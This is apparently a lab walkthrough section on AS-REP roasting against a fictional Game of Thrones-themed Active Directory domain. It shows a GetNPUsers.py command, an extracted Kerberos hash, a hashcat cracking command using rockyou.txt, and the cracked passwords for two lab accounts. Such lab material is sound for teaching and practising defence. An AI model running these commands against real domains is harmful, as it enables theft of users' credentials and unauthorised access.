⚔️4.3 - ASREP Roasting
ASREP Roasting
First we save into .txt all usernames founded for the doamin north.sevenkingdoms.local. Then we can use GetNPUsers.py for the tickets
GetNPUsers.py north.sevenkingdoms.local/ -no-pass -usersfile usersList.txt
###############################################
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:dccf6f02665080f8d076211bb2d59a87$e3121a6dc5426f5dc28ef312948c9242328764c33f57b3d1ffbcfa47ef3d066c2e312ec03a5d4747ee1be2135b2cda985318325489882125455c18c9ceecfc9d6efafb650cc49ff0a1e9f8ec1e1a8de943fd6786d2010d3d44e1a641b43362f72e7490d1adbede9ade9ba58287f20863f77bf934b932bc0f19333585d7ad12e93d594d35ec72cac388baf9320d4a13c2808e4562290d9ddd6804365192b499c558b50b22537899891acfe2e700124c5e28b755a98acff1dbd615f6d967082fb54f6871ed2b26e066c898b6b25324a0276b486d25b78796fbaa23889939fefa9d021ceb4963d712aef163b1556030965ae2baaaeff0ad3bc9decb997f485b8a006713edc0c308
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH setCracking Hahes
hashcat -m 18200 -a 0 brandon.stark.hash.txt /usr/share/wordlists/rockyou.txt 
NICE!! We now have two credentials :
samwell.tarly:Heartsbane
brandon.stark:iseedeadpeople
Last updated